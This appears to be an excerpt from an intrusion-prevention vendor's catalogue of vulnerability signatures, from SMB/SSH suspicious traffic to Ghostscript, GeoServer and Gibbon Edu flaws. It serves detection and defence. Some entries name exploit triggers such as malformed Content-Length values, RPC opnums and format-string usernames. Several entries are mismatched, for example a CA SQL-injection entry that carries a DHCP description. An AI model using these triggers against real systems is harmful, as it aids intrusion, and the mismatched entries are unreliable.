File-PNG_Shared-Variables File-RTF_Shared-Variables File-RIFF_Shared-Variables File-TextId_Shared-Variables File-Zip_Shared-Variables File-Member-Name_Shared-Variables File-Name_Shared-Variables Datalength-UDP_Shared-Variables Datalength-TCP_Shared-Variables

Generic-SMB-Exploit

About this vulnerability:	Suspicious traffic patterns
Risk:	Moderate
First detected in:	sgpkg-ips-681-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	This vulnerability refers to a number of situations that detect known suspicious or malicious traffic patterns.
Situation:	SMB-TCP_Suspicious-Server-Response

Generic-Solaris-Sparc-ShellCode

About this vulnerability:	Shellcode for Sun Solaris/Sparc operating system.
Risk:	High
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Solaris
Software:	<os>
Type:	Buffer Overflow
Description:	This is a generic vulnerability description for shellcode that can be executed on Sun Solaris/Sparc. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation:	Shared_ShellCode-Solaris-Sparc-Portbind Shared_ShellCode-Solaris-Sparc-Setreuid-Execve

Generic-SSH-Exploit

About this vulnerability:	Suspicious traffic patterns
Risk:	Moderate
First detected in:	sgpkg-ips-767-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	This vulnerability refers to a number of situations that detect known suspicious or malicious traffic patterns.
Situation:	SSH_Suspicious-Client-Request

Generic-Symantec-AntiVirus-Scan-Engine-Buffer-Overflow-Vulnerability

About this vulnerability:

Symantec AntiVirus Scan Engine Administrative Interface Buffer Overflow Vulnerability

Risk:

Critical

First detected in:

sgpkg-ips-60-1210

Last changed:

sgpkg-ips-1584-5242

Platform:

Generic

Software:

Symantec AntiVirus Scan Engine

Type:

Buffer Overflow

Description:

Symantec AntiVirus Scan Engine has a buffer overflow vulnerability. A remote attacker can exploit this vulnerability by providing user credentials via the HTTP request containing Content-Length value -1 or 0xffffffff. A succesfull exploitation can allow root/system-level compromise.

Situation:

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-ActiveUpdate-And-ActiveRollback-BOF
Generic_Trend-Micro-ServerProtect-RPC-ActiveUpdate-And-ActiveRollback-BOF

References:

CVE-2005-2758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2758

BID-15001
http://www.securityfocus.com/bid/15001

OSVDB-19854
http://www.osvdb.org/19854

Generic-Trend-Micro-ServerProtect-RPC-ActiveUpdate-And-ActiveRollback-BOF

About this vulnerability:

Buffer overflow vulnerability in Trend Micro's ServerProtect

Risk:

High

First detected in:

sgpkg-ips-99-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Trend Micro ServerProtect

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Trend Micro's ServerProtect. A crafted RPC call with opnum 0 and a malicious string parameter allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.

Situation:

References:

CVE-2007-1070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1070

BID-22639
http://www.securityfocus.com/bid/22639

Generic-Trend-Micro-ServerProtect-RPC-Call-CMON-NetTestConnection-BOF

About this vulnerability:

Buffer overflow vulnerability in Trend Micro's ServerProtect

Risk:

High

First detected in:

sgpkg-ips-99-1314

Last changed:

sgpkg-ips-1734-5242

Platform:

Generic

Software:

Trend Micro ServerProtect

Type:

Buffer Overflow

Description:

Situation:

MSRPC-TCP_CPS_Trend-Micro-ServerProtect-RPC-Call-CMON-NetTestConnection-Access
MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-Call-CMON-NetTestConnection-BOF

References:

CVE-2007-1070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1070

BID-22639
http://www.securityfocus.com/bid/22639

OSVDB-33042
http://www.osvdb.org/33042

Generic-Trend-Micro-ServerProtect-RPC-Call-ENG-SendEMail-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Trend Micro's ServerProtect

Risk:

High

First detected in:

sgpkg-ips-99-1314

Last changed:

sgpkg-ips-1734-5242

Platform:

Generic

Software:

Trend Micro ServerProtect

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Trend Micro's ServerProtect. A crafted RPC call with opnum 0 with subcode 0x0047 and a malicious string parameter allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.

Situation:

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-Call-ENG-SendEMail-Buffer-Overflow

References:

CVE-2007-1070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1070

BID-22639
http://www.securityfocus.com/bid/22639

OSVDB-33042
http://www.osvdb.org/33042

Generic-Trend-Micro-ServerProtect-RPC-ENG-SetRealTimeScanConfigInfo-BOF

About this vulnerability:

Buffer overflow vulnerability in Trend Micro's ServerProtect

Risk:

High

First detected in:

sgpkg-ips-99-1314

Last changed:

sgpkg-ips-1734-5242

Platform:

Generic

Software:

Trend Micro ServerProtect

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Trend Micro's ServerProtect. A crafted RPC call with opnum 0 with subcode 0x0004 and a malicious string parameter allows arbitrary code execution with the privileges of the affected service process, which is SYSTEM on Windows platforms.

Situation:

MSRPC-TCP_CPS-Trend-Micro-ServerProtect-RPC-ENG-SetRealTimeScanConfigInfo-BOF

References:

CVE-2007-1070
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1070

BID-22639
http://www.securityfocus.com/bid/22639

OSVDB-33042
http://www.osvdb.org/33042

Generic-Trojan-SMTP-Infection-Traffic

About this vulnerability:	Generic trojan infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1353-5242
Last changed:	sgpkg-ips-1353-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Malicious traffic detected.
Situation:	SMTP_CS-Generic-Trojan-SMTP-Infection-Traffic

Generic-Webmin-And-Usermin-Format-String-Vulnerability

About this vulnerability:

Detects Webmin and Usermin format string exploits

Risk:

Moderate

First detected in:

sgpkg-ips-53-1210

Last changed:

sgpkg-ips-1589-5242

Platform:

Generic

Software:

Webmin; Usermin

Type:

Format String

Description:

When an unknown user logs in to Webmin or Usermin, the username argument is unsecurely processed with the Perl 'syslog' facility. Perl 'syslog' uses the sprintf function with the username argument and processes any format specifiers accordingly. This feature can be exploted by giving a username containing %n or %0(large number)d strings.

Situation:

HTTP_CRL-Webmin-And-Usermin-Format-String-Vulnerability

References:

CVE-2005-3912
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3912

BID-15629
http://www.securityfocus.com/bid/15629

OSVDB-21222
http://www.osvdb.org/21222

Generic_CS-Agobot-IRC-Activity

About this vulnerability:	Botnet IRC Activity
Risk:	High
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Agobot, and its close relatives such as Phatbot, Forbot and XtremBot, build a IRC-controlled botnet.
Situation:	Generic_SS-Agobot-IRC-Activity

Generic_CS-CA-Embarcadero-Interbase-ConnReq-Stack-Buffer-Overflow

About this vulnerability:

An attempt to exploit vulnerability in Embarcadero Interbase detected

Risk:

Moderate

First detected in:

sgpkg-ips-391-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows; Linux

Software:

Borland Interbase

Type:

Malfunction

Description:

Multiple code execution vulnerabilities have been reported in Embarcadero InterBase that could allow remote attackers to execute arbitrary code on the vulnerable system due to insufficient input validation. The vulnerability is due to an error in the handling TCP packets which contain specially crafted "connect" requests (opcode 0x01).

Situation:

Generic_CS-Embarcadero-Interbase-ConnReq-Stack-Buffer-Overflow

References:

BID-47644
http://www.securityfocus.com/bid/47644

Generic_CS-CA-Total-Defense-Suite-getDBConfigSettings-Credential-Disclosure

About this vulnerability:

An attempt to exploit vulnerability in CA Total Defense Suite detected

Risk:

Moderate

First detected in:

sgpkg-ips-389-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

CA Total Defense Suite

Type:

Malfunction

Description:

An information disclosure vulnerability exists in CA Total Defense Suite that can be reached through a remote web service call. The vulnerability is due to insufficient access control when handling requests for the web service getDBConfigSettings.

Situation:

HTTP_CS-CA-Total-Defense-Suite-getDBConfigSettings-Credential-Disclosure

References:

CVE-2011-1655
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1655

BID-47356
http://www.securityfocus.com/bid/47356

Generic_CS-CA-Total-Defense-Suite-SQL-Injection-Vulnerability

About this vulnerability:

An attempt to exploit vulnerability in CA Total Defense Suite detected

Risk:

Moderate

First detected in:

sgpkg-ips-389-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

CA Total Defense Suite

Type:

Malfunction

Description:

A flaw exists in ISC DHCP dhclient that facilitates a command injection vulnerability, that could allow remote attackers to execute arbitrary commands on the vulnerable system. The vulnerability is due to an input validation error while parsing a specially crafted response from a DHCP server. The vulnerable code allows some of the special shell escape characters in multiple parameters to be passed verbatim into the client network configuration script, allowing for injection and execution of arbitrary shell commands.

Situation:

HTTP_CS-CA-Total-Defense-Suite-SQL-Injection-Vulnerability
HTTP_CRL-CA-Total-Defense-Suite-SQL-Injection-Vulnerability

References:

CVE-2011-1653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1653

BID-47355
http://www.securityfocus.com/bid/47355

Generic_CS-FlawedAmmyy-RAT-C2-Traffic

About this vulnerability:	FlawedAmmyy RAT C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1088-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	FlawedAmmyy is a powerful remote access trojan (RAT), that has been spread via malicious email messages. This RAT has also been used in highly targeted campaigns.
Situation:	Generic_CS-FlawedAmmyy-RAT-C2-Traffic

Generic_CS-Quest-Software-Big-Brother-Arbitrary-File-Deletion-And-Overwriting

About this vulnerability:

An attempt to exploit vulnerability in Quest Software Big Brother detected

Risk:

Moderate

First detected in:

sgpkg-ips-391-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Quest Software Big Brother

Type:

Malfunction

Description:

Two directory traversal vulnerabilities exist in bbntd.exe, a component of Quest Software Big Brother. These vulnerabilities allow a remote attacker to delete or overwrite arbitrary files using the "page" and "ack addtag_event" commands, respectively.

Situation:

Generic_CS-Quest-Software-Big-Brother-Arbitrary-File-Deletion-And-Overwriting

References:

OSVDB-72347
http://www.osvdb.org/72347

Generic_IBM-DB2-Database-Server-Connect-Request-Denial-Of-Service

About this vulnerability:

Connect Request Denial of Service vulnerability in IBM DB2

Risk:

Moderate

First detected in:

sgpkg-ips-216-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM DB2

Type:

Input Validation

Description:

There is a denial of service vulnerability in IBM DB2 Database Server. The flaw is due to insufficient input validation when processing malformed connect data streams. Remote attackers can exploit this vulnerability by sending a malicious Distributed Relational Database Architecture (DRDA) connect data stream to the server. A successful exploitation can cause the server process to enter an infinite loop, resulting in a Denial of Service condition.

Situation:

Generic_IBM-DB2-Database-Server-Connect-Request-Denial-Of-Service

References:

CVE-2009-0172
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0172

BID-33258
http://www.securityfocus.com/bid/33258

Generic_IBM-DB2-Database-Server-Invalid-Data-Stream-Denial-Of-Service

About this vulnerability:

Invalid Data Denial of Service in IBM DB2

Risk:

Moderate

First detected in:

sgpkg-ips-217-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

IBM DB2

Type:

Input Validation

Description:

There is a denial of service vulnerability in IBM DB2 Database Server. The flaw is due to insufficient input validation when processing malformed data streams. Remote authenticated attackers could exploit this vulnerability by sending a malicious Distributed Relational Database Architecture (DRDA) data stream to theserver. In a successful attack, the affected server terminates and is not available until the service is manually restarted.

Situation:

Generic_IBM-DB2-Database-Server-Invalid-Data-Stream-Denial-Of-Service

References:

CVE-2009-0173
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0173

BID-33258
http://www.securityfocus.com/bid/33258

Generic_IBM-WebSphere-Application-Server-Cross-Site-Scripting

About this vulnerability:	IBM WebSphere Application Server cross-site scripting
Risk:	Low
First detected in:	sgpkg-ips-216-2032
Last changed:	sgpkg-ips-1349-5242
Platform:	Generic
Software:	IBM WebSphere Application Server
Type:	Input Validation
Description:	There is a cross-site scripting vulnerability in IBM WebSphere Application Server (WAS). The flaw is due to a lack of validation of user-supplied input data. The flaw may be exploited by malicious users to execute arbitrary HTML and script code on the target user's web browser in the context of a trusted web site. An attack targeting this vulnerability can result in the injection and execution of script code. If code execution is successful, the behavior of the target depends on the intention of the attacker. Unsuccessful attack attempts can either be unnoticed by the target user, or cause incorrect rendering of the affected web pages.
Situation:	HTTP_CSU-IBM-WebSphere-Application-Server-Cross-Site-Scripting

Generic_Solaris_X86-ShellCode

About this vulnerability:	Shellcode for Sun Solaris/x86 operating system.
Risk:	High
First detected in:	sgpkg-ips-6-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Solaris
Software:	<os>
Type:	Buffer Overflow
Description:	This is a generic vulnerability description for shellcode that can be executed on Sun Solaris/x86. Shellcode is a set of platform-specific machine instructions that are used to execute commands in buffer overflow attacks.
Situation:	Shared_ShellCode-Solaris-X86-Ingreslock Shared_ShellCode-Solaris-X86-Setuid-Execve Shared_ShellCode-Solaris-X86-Toupper-Execve

Generic_UDP-ISC-DHCP-dhclient-Network-Configuration-Script-Command-Injection

About this vulnerability:

A vulnerability in ISC DHCP dhclient

Risk:

Moderate

First detected in:

sgpkg-ips-389-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC DHCP dhclient

Type:

Script Injection

Description:

Situation:

Generic_UDP-ISC-DHCP-dhclient-Network-Configuration-Script-Command-Injection
BOOTP_CS-ISC-DHCP-dhclient-Network-Configuration-Script-Command-Injection

References:

CVE-2011-0997
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0997

BID-47176
http://www.securityfocus.com/bid/47176

OSVDB-71493
http://www.osvdb.org/71493

Generic_VMware-Authentication-Server-Denial-Of-Service

About this vulnerability:

VMware Authenticaion Server Denial of Service

Risk:

Low

First detected in:

sgpkg-ips-216-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

EMC VMware Workstation; EMC VMware Player

Type:

Input Validation

Description:

VMware Workstation and Player suffer from a denial of service vulnerability in the authentication daemon (vmware-authd(.exe)). A long USER or PASS command can be used to trigger the condition.

Situation:

Generic_VMware-Authentication-Server-Denial-Of-Service

References:

CVE-2009-0177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0177

BID-34373
http://www.securityfocus.com/bid/34373

OSVDB-51180
http://www.osvdb.org/51180

GENESIS32-And-GENESIS64-GenBroker.exe-DoS

About this vulnerability:	A vulnerability in GENESIS32 and GENESIS64 GenBroker.exe allowing DoS
Risk:	High
First detected in:	sgpkg-ips-613-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Genesis HTTP server
Type:	Malfunction
Description:	A vulnerability exists in GENESIS32 and GENESIS64 GenBroker.exe which allows an attacker to send a manually crafted packet, allowing for a DoS attack.
Situation:	HTTP_CS-GENESIS32-And-GENESIS64-GenBroker.exe-DoS

GeoServer-Jiffle-Remote-Code-Execution-CVE-2022-24816

About this vulnerability:

A vulnerability in GeoServer

Risk:

High

First detected in:

sgpkg-ips-1756-5242

Last changed:

sgpkg-ips-1756-5242

Platform:

Generic

Software:

GeoServer

Type:

Code Injection

Description:

GeoServer versions prior to 1.2.22 are vulnerable to remote code execution without any authentication requirements. The flaw is due to the software allowing Jiffle script execution and including a vulnerable version of the JAI-EXT API.

Situation:

HTTP_CRL-GeoServer-Jiffle-Remote-Code-Execution-CVE-2022-24816

References:

CVE-2022-24816
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24816

GeoServer-Server-Side-Request-Forgery-CVE-2021-40822

About this vulnerability:

A vulnerability in GeoServer

Risk:

High

First detected in:

sgpkg-ips-1836-5242

Last changed:

sgpkg-ips-1836-5242

Platform:

Generic

Software:

GeoServer

Type:

Malfunction

Description:

A server-side request forgery vulnerability exists in GeoServer versions prior to 2.19.3, 2.18.5, and 2.17.6.

Situation:

HTTP_CRL-GeoServer-Server-Side-Request-Forgery-CVE-2021-40822

References:

CVE-2021-40822
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40822

GeoServer-SQL-Injection-CVE-2023-25157

About this vulnerability:

An attempt to exploit a vulnerability in Geoserver detected

Risk:

High

First detected in:

sgpkg-ips-1635-5242

Last changed:

sgpkg-ips-1635-5242

Platform:

Generic

Software:

GeoServer

Type:

Input Validation

Description:

GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. It includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore encode functions setting to mitigate "strEndsWith", "strStartsWith" and "PropertyIsLike" misuse and enable the PostGIS DataStore preparedStatements setting to mitigate the "FeatureId" misuse.

Situation:

HTTP_CRL-GeoServer-SQL-Injection-CVE-2023-25157

References:

CVE-2023-25157
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25157

GeoServer-Unauthenticated-Remote-Code-Execution-CVE-2024-36401

About this vulnerability:

An attempt to exploit a vulnerability in GeoServer detected

Risk:

High

First detected in:

sgpkg-ips-1754-5242

Last changed:

sgpkg-ips-1756-5242

Platform:

Windows; Linux; Unix

Software:

GeoServer

Type:

Input Validation

Description:

A vulnerability in GeoServer, verions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1, which allows remote attackers to execute arbitrary code through multiple OGC request parameters, due to insufficient input validation.

Situation:

HTTP_CRL-GeoServer-Unauthenticated-Remote-Code-Execution-CVE-2024-36401

References:

CVE-2024-36401
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36401

Geovision-Livex-Directory-Traversal

About this vulnerability:

An attempt to exploit a vulnerability in GeoVision LiveX detected

Risk:

Moderate

First detected in:

sgpkg-ips-1792-5242

Last changed:

sgpkg-ips-1792-5242

Platform:

Generic

Software:

GeoVision LiveX

Type:

Directory Traversal

Description:

A directory traversal vulnerability in the SnapShotToFile method of the GeoVision LiveX ActiveX control allows creating and overwriting arbitrary files.

Situation:

File-Text_Geovision-Livex-Directory-Traversal-Vulnerability

References:

CVE-2009-0865
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0865

Gestart-Php-Remote-File-Inclusion-Vulnerability

About this vulnerability:

A vulnerability in Gestart

Risk:

High

First detected in:

sgpkg-ips-343-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GestArt

Type:

Input Validation

Description:

A PHP remote file inclusion exists in GestArt aide.php component. Successful exploitation of this issue leads into arbitrary code execution.

Situation:

HTTP_CRL-Gestart-Aide-Php-Remote-Code-Execution

References:

CVE-2006-5612
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5612

BID-20750
http://www.securityfocus.com/bid/20750

GetGo-Download-Manager-HTTP-Response-Buffer-Overflow

About this vulnerability:

A GetGo Download Manager HTTP Response Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-779-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

GetGo

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in GetGo Download Manager, versions 4.9.0.1982 and before, which allows remote attackers to execute arbitrary code by persuading the victim to download a file from a malicious server.

Situation:

HTTP_SLS-GetGo-Download-Manager-HTTP-Response-Buffer-Overflow

References:

CVE-2014-2206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2206

OSVDB-103910
http://www.osvdb.org/103910

GetSimpleCMS-Unauthenticated-RCE

About this vulnerability:

A vulnerability in GetSimpleCMS

Risk:

High

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GetSimpleCMS

Type:

Input Validation

Description:

A vulnerability in GetSimpleCMS, versions 3.3.15 and before, which allows remote attackers to execute arbitrary code due to improper user input validation.

Situation:

HTTP_CRL-GetSimpleCMS-Unauthenticated-RCE

References:

CVE-2019-11231
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11231

Geutebruck-Instantrec-Remote-Command-Execution

About this vulnerability:

A vulnerability in Geutebruck devices.

Risk:

High

First detected in:

sgpkg-ips-1400-5242

Last changed:

sgpkg-ips-1400-5242

Platform:

Unix; Linux

Software:

Geutebruck

Type:

Buffer Overflow

Description:

A vulnerability in Geutebruck devices, versions G-Cam EEC-2xxx, G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx, running firmware versions 1.12.0.27, 1.12.13.2 and 1.12.14.5, which allows remote attackers to execute arbitrary code via the action parameter to instantrec.cgi.

Situation:

HTTP_CRL-Geutebruck-Instantrec-Remote-Command-Execution

References:

CVE-2021-33549
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33549

Geutebruck-Multiple-RCE-CVE-2021-335xx

About this vulnerability:

A vulnerability in Geutebruck devices.

Risk:

High

First detected in:

sgpkg-ips-1400-5242

Last changed:

sgpkg-ips-1400-5242

Platform:

Unix; Linux

Software:

Geutebruck

Type:

Input Validation

Description:

A vulnerability in Geutebruck devices, versions G-Cam EEC-2xxx, G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx, running firmware versions 1.12.0.27 and before, 1.12.13.2 and 1.12.14.5, which allows remote attackers to execute arbitrary commands by a basic authentication bypass and multiple command execution vulnerabilities within various parameters. CVE-2021-33543, CVE-2021-33544, CVE-2021-33548, CVE-2021-33550, CVE-2021-33551, CVE-2021-33552, CVE-2021-33553, CVE-2021-33554.

Situation:

HTTP_CRL-Geutebruck-Multiple-RCE-CVE-2021-335xx

References:

CVE-2021-33543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33543

Geutebruck-testaction-RCE

About this vulnerability:

A vulnerability in Geutebruck camera firmware

Risk:

High

First detected in:

sgpkg-ips-1283-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Geutebruck

Type:

Input Validation

Description:

There exists a vulnerability in Geutebruck devices G-Cam EEC-2xxx, G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx with firmware versions 1.12.0.25 and below, and version 1.12.13.2, and version 1.12.14.5, which allows remote attckers to execute arbitrary commands via the server parameter, when the 'type' GET parameter is set to 'ntp'.

Situation:

HTTP_CSU-Geutebruck-testaction-RCE

References:

CVE-2020-16205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16205

Geutebrueck-GCore-GCoreServer.exe-Buffer-Overflow

About this vulnerability:

A Geutebrueck GCore GCoreServer.exe Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-1028-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Geutebrueck GCore

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Geutebrueck GCore GCoreServer.exe, versions 1.3.8.42 and 1.4.2.37, which allows remote attackers to execute arbitrary code via a long URI in a GET request.

Situation:

Generic_CS-Geutebrueck-GCore-GCoreServer.exe-Buffer-Overflow

References:

CVE-2017-11517
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11517

Gh0st-C2-Server-Buffer-Overflow

About this vulnerability:	A vulnerability in the Gh0st C2 Server.
Risk:	High
First detected in:	sgpkg-ips-1023-5242
Last changed:	sgpkg-ips-1461-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	A buffer overflow vulnerability in the Gh0st C2 server which allows remote attackers to gain control of the target machine, and execute arbitrary code.
Situation:	HTTP_CS-Gh0st-C2-Server-Buffer-Overflow

Gheg-Spambot

About this vulnerability:	Gheg spambot is a template-based spamming engine
Risk:	High
First detected in:	sgpkg-ips-270-3038
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Gheg spambot
Type:	Backdoor
Description:	Gheg spambot is a template-based spamming engine.
Situation:	HTTPS_CS-Gheg-Spambot

Ghost-CMS-Content-API-Filtering-Information-Disclosure

About this vulnerability:

A vulnerability in Ghost Foundation Ghost

Risk:

Moderate

First detected in:

sgpkg-ips-1590-5242

Last changed:

sgpkg-ips-1590-5242

Platform:

Generic

Software:

Ghost Foundation Ghost

Type:

Input Validation

Description:

Improper input validation when using filtering on the Content API endpoints causes a vulnerability in the Ghost CMS. A successful exploit allows an attacker to access information on the target system.

Situation:

HTTP_CRL-Ghost-CMS-Content-API-Filtering-Information-Disclosure

References:

CVE-2023-31133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31133

Ghost-CMS-Static-theme.js-Path-Traversal

About this vulnerability:

A vulnerability in Ghost Foundation Ghost

Risk:

Moderate

First detected in:

sgpkg-ips-1592-5242

Last changed:

sgpkg-ips-1592-5242

Platform:

Generic

Software:

Ghost Foundation Ghost

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Ghost CMS. The vulnerability is due to improper validation of the user-supplied path in the static-theme.js component. A remote, unauthorized attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in disclosing sensitive information.

Situation:

HTTP_CSU-Ghost-CMS-Static-theme.js-Path-Traversal

References:

CVE-2023-32235
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32235

GhostDNS

About this vulnerability:	GhostDNS campaign
Risk:	High
First detected in:	sgpkg-ips-1107-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic DNS server
Type:	Dns Spoof
Description:	GhostDNS is a malware campaign targeting insecure routers. It modifies the DNS settings on the router to reroute traffic to malicious websites.
Situation:	HTTP_CSU-DNSChanger-Scan-URL File-Text_DNSChanger-Injected-Iframe

Ghostscript-Eps-File-Command-Execution-CVE-2017-8291

About this vulnerability:

A vulnerability in Ghostscript

Risk:

High

First detected in:

sgpkg-ips-1485-5242

Last changed:

sgpkg-ips-1485-5242

Platform:

Generic

Software:

Ghostscript

Type:

Input Validation

Description:

A type confusion vulnerability has been reported in the Artifex Ghostscript versions up to and including 9.21. Processing a maliciously crafted EPS file with a vulnerable version of the software can result in arbitrary command execution.

Situation:

File-TextId_Ghostscript-File-Command-Execution

References:

CVE-2017-8291
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8291

Ghostscript-Failed-Restore-Command-Execution-CVE-2018-16509

About this vulnerability:

An attempt to exploit a vulnerability in Ghostscript detected

Risk:

High

First detected in:

sgpkg-ips-1771-5242

Last changed:

sgpkg-ips-1771-5242

Platform:

Generic

Software:

Ghostscript

Type:

Input Validation

Description:

An issue was discovered in Artifex Ghostscript before 9.24. Incorrect "restoration of privilege" checking during handling of /invalidaccess exceptions could be used by attackers able to supply crafted PostScript to execute code using the "pipe" instruction.

Situation:

File-Text_Ghostscript-File-Command-Execution

References:

CVE-2018-16509
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16509

Ghostscript-Format-String-Exploitation-CVE-2024-29510

About this vulnerability:

An attempt to exploit a vulnerability in Ghostscript detected

Risk:

High

First detected in:

sgpkg-ips-1748-5242

Last changed:

sgpkg-ips-1750-5242

Platform:

Generic

Software:

Ghostscript

Type:

Input Validation

Description:

CVE-2024-29510 is a format string vulnerability in Ghostscript prior to 10.03.0, which can be exploited to bypass the "-dSAFER" sandbox and gain code execution. It has significant impact on web-applications and other services offering document conversion and preview functionalities as these often use Ghostscript under the hood.

Situation:

File-Text_Potential-Ghostscript-Format-String-Exploitation-CVE-2024-29510
File-Text_Ghostscript-Format-String-Exploitation-CVE-2024-29510
File-TextId_Potential-Ghostscript-Format-String-Exploitation-CVE-2024-29510
File-TextId_Ghostscript-Format-String-Exploitation-CVE-2024-29510

References:

CVE-2024-29510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29510

Gibbon-Edu-Arbitrary-File-Write-CVE-2023-45878

About this vulnerability:

A vulnerability in Gibbon Edu

Risk:

High

First detected in:

sgpkg-ips-1657-5242

Last changed:

sgpkg-ips-1657-5242

Platform:

Generic

Software:

Gibbon Edu

Type:

Malfunction

Description:

An arbitrary file write vulnerability has been reported in Gibbon Edu versions up to and including 25.0.1. The vulnerable endpoint rubrics_visualise_saveAjax.php does not require authentication and allows file uploads. An attacker could exploit this vulnerability to achieve remote code execution by uploading arbitrary PHP files.

Situation:

HTTP_CRL-Gibbon-Edu-Arbitrary-File-Write-CVE-2023-45878

References:

CVE-2023-45878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45878

Gibbon-School-Platform-Authenticated-PHP-Deserialization-Vulnerability

About this vulnerability:

An attempt to exploit a vulnerability in Gibbon Edu detected

Risk:

High

First detected in:

sgpkg-ips-1714-5242

Last changed:

sgpkg-ips-1715-5242

Platform:

Generic

Software:

Gibbon Edu

Type:

Input Validation

Description:

A vulnerability in Gibbon online school platform, versions 26.0.00 and before, that allows remote attackers to execute arbitrary code by conducting a PHP deserialization attacks via columnOrder in a POST request to the endpoint /modules/System%20Admin/import_run.php&type=externalAssessment&step=4.

Situation:

HTTP_CRL-Gibbon-School-Platform-Authenticated-PHP-Deserialization-Vulnerability

References:

CVE-2024-24725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-24725

